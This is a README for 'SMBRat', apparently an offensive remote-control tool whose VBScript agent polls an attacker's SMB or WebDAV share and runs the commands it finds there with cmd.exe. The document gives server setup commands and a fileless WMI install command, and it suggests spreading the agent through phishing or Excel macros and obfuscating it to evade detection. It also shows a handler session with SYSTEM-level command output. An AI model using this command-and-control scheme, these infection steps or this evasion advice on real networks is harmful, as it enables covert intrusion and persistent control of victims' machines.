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A Windows Remote Administration Tool in Visual Basic with UNC paths

persistence remote-admin-tool shell smb vbs visual-basic windows wmi

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A Windows Remote Administration Tool in Visual Basic with UNC paths




# SMBRat
A Windows Remote Administration Tool in *Visual Basic Script*

## Idea
*Windows Environments* like *Active Directory* Networks, get really bloated with *SMB* traffic.

All hosts get *Policies* from the *SYSVOL*, configurations need remote files to work, desktop shortcuts tend to point to ``\\something\else\in\the\network.exe``.

None would notice one more connection attempt. *Right?*

\- Especially if it succeeds (it is a fashion to only monitor *Firewall* ***Denies***)

## Ingredients

### Agent

#### Documentation/Archiving Friendly
The `agent` is a *Visual Basic Script* that runs on the infected host and connects to the *SMB Server*. It creates a directory in there named after the host's `hostname` and primary `MAC` address (trying to be *unique* and *informative* at the same time for reporting purposes). All commands and info for the infected Host will be stored in this directory. `zip`ping the whole Shared Folder will archive all project info!

#### Stealthy
It does **NOT** use a drive letter to *Mount* the Share, just uses `UNC paths` to directly read remote files (no *Drive* is created in `explorer.exe`).

It also injects the `UNC path` into the `%PATH%` variable of its own execution environment (you can run executables directly from your Linux machine's filesystem).

#### Agent's Execution

The `agent` is configured to **run once**. **Statelessly**.

It's Routine is (more-or-less) as follows:
* It looks for a file named `exec.dat` in the folder it created in the *SMB Share*
* If it finds the file, it **reads its content** and executes it as a command with `cmd.exe /c ` like a *semi-interactive shell*.
* The command's response is stored in `output.dat` (next to `exec.dat`).
* Deletes the `exec.dat` file.

##### [Wiki Page for Setting the *Agent*](

### Handler

The `handler` needs an *SMB Server* to work. The `` module from [*Core Security's* `impacket`]( package will do.

Most probably `smbd` would also do the trick, but hasn't been tested yet.

#### Setting up the *SMB Server*

A share with name `D$` is needed, to look like a legit Windows host's SMB.

# mkdir Share
# -comment "My Share" "D$" Share/
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

#### The *WebDAV* case!
As the `agent` is configured to only use UNC paths, WebDAV can also be used with **zero-changes**.
Instead of an SMB server, a *WebDAV server* can be used (a great WebDAV server with SSL support is [wsgidav](

# mkdir 'D$'
# wsgidav -p 80 -H -r . --auth anonymous
[...] INFO : WsgiDAV/3.0.0 Python/2.7.16 Linux-4.19.0-kali3-amd64-x86_64-with-Kali-kali-rolling-kali-rolling
[...] INFO : Lock manager: LockManager(LockStorageDict)
[...] INFO : Property manager: None
[...] INFO : Domain controller: SimpleDomainController()
[...] INFO : Registered DAV providers by route:
[...] INFO : - '/:dir_browser': FilesystemProvider for path '/root/.virtualenvs/wsgidav/local/lib/python2.7/site-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous)
[...] INFO : - '/': FilesystemProvider for path '/tmp/DAV' (Read-Write) (anonymous)
[...] WARNING : Basic authentication is enabled: It is highly recommended to enable SSL.
[...] WARNING : Share '/:dir_browser' will allow anonymous read access.
[...] WARNING : Share '/' will allow anonymous write access.
[...] INFO : Running WsgiDAV/3.0.0 Cheroot/6.5.4 Python/2.7.16
[...] INFO : Serving on ...

[...] INFO : - (anonymous) - [2019-04-18 14:57:53] "PROPFIND /D$/Project1/DESKTOP-I3NFOQ5-John-AA-BB-CC-DD-EE-FF/ping.dat" length=0, depth=0, elap=0.004sec -> 207 Multi-Status
For the SSL support, the UNC paths have to change slightly, from:
This change can only be done to `ServerName` `agent.vbs` variable, as all paths are constructed by this.
Keep in mind that the SSL certificates have to be **trusted by the system running the `agent`**. Self-signed Certificates **will fail** with warnings.

## Infection Scheme

### Infect a Host from a file
A *While loop* can be added to the `agent.vbs` file's beginning, with a delay statement of multiple seconds (10 secs is ideal), and it will be able to infect windows hosts by *double clicking* / *phishing* / *excel macros* / etc...

A `while True` loop in *VBS* with delay of 1 second looks like this:
Do While True
WScript.Sleep 1000

### Infect a Host *fileless*
Yet, if a Windows host has *RPC* enabled, it is possible to install the *VBS* file as *fileless malware* through `WMI` and the fabulous `impacket` package examples with a command like:
$ examples/ ':@' install -vbs agent.vbs -name smbrat -timer 10

It is also possible to utilize the `WMI` tool by local access to install the `agent.vbs` as fileless malware.

### Obfuscation?
Visual Basic Scripts can be nicely *obfuscated*, *base64*'d as well as *minified*.

It can be really handy to give it a spin before "deploying" :wink:
* [Online Tool for VBS Obfuscation](
* [Github Repo](

## [Directory Structure in the *SMB Share*](

#### Never create folders manually in the Shared Folder

## Barebone Usage

~~At time of writing, no `Handler` shell is implemented,~~ so usage can be done by just using a command like `watch` to inspect the `output.dat` file:

$ watch -n0.2 cat Share/projectName/DESKTOP-XXXXXXX-AA\:BB\:CC\:DD\:EE\:FF/output.dat
and `echo` to write stuff to the `exec.dat` file:
$ echo 'whoami /all' > Share/projectName/DESKTOP-XXXXXXX-AA\:BB\:CC\:DD\:EE\:FF/exec.dat

## The ``

The experimental shell works as follows:
$ python Share/
# When a new host gets infected:
[+] Agent "DESKTOP-EG4OE7J" (00:0C:29:2B:9F:AF) just checked-in for Project: "projectName"

SMBRat> execall whoami /user

[>] Sending 'whoami /user' to "projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF" ...

[<] Response from 'projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF':


User Name SID
=================== ========
nt authority\system S-1-5-18

^^^^^^^^^^^^^^^^^^^^ projectName/DESKTOP-EG4OE7J-00:0C:29:2B:9F:AF ^^^^^^^^^^^^^^^^^^^^


## Outstanding Pitfalls

### SMBv1 is **Not Encrypted** :

# tcpdump -i eth0 -A
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes


15:25:06.695502 IP > Flags [P.], seq 2876:2971, ack 4791, win 2110, length 95 SMB PACKET: SMBreadX (REPLY)

E...,E@[email protected].../.../....8
.@............ .;........... .net localgroup "administrators"


15:25:06.702916 IP > Flags [P.], seq 4917:5111, ack 3097, win 2052, length 194 SMB PACKET: SMBtrans2 (REQUEST)




15:25:06.751372 IP > Flags [P.], seq 6049:6393, ack 3748, win 2050, length 344 SMB PACKET: SMBwrite (REQUEST)

[email protected]../.../..8..i~.
.T....$.......'..$.Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain


The command completed successfully.



The traffic (file *contents* and *paths*) are tranfered in plaintext if *SMBv1 Server* is used (e.g `impacket` 's ``).

* An encryption/obfuscation layer would totally solve this one!

### The whole Share is *READ/WRITE* to Everyone:

All Agents can modify files stored in the **Whole Share**. Meaning they can modify the `exec.dat` of other Agents...
An `smbmap` will shed light:
$ smbmap -H
[+] Finding open SMB ports....
[+] User SMB session establishd on
[+] IP: Name: Deskjet-4540
Disk Permissions
---- -----------
[!] Unable to remove test directory at \\\D$\SVNRmxBFAO, plreae remove manually
[!] Unable to remove test directory at \\\IPC$\SVNRmxBFAO, plreae remove manually
#### Pay attention to the lack of `-u` and `-p` parameters of `smbmap`.
This is a *NULL session* (like FTP anonymous login). **EVERYONE can change the SHARE Files** and get *Remote Code Execution* on all infected machines.

* Better fire up some `iptables` here...

### The sessions are NOT **Interactive**

Type `execall netsh` and you lost all your Agents. None will respond as the `agent.vbs` will spawn the `netsh.exe` shell and will wait for it to terminate, so it can write its contents to `output.dat`. But Guess What... It **won't** terminate... It's gonna hang with the `netsh>` pointing to the void.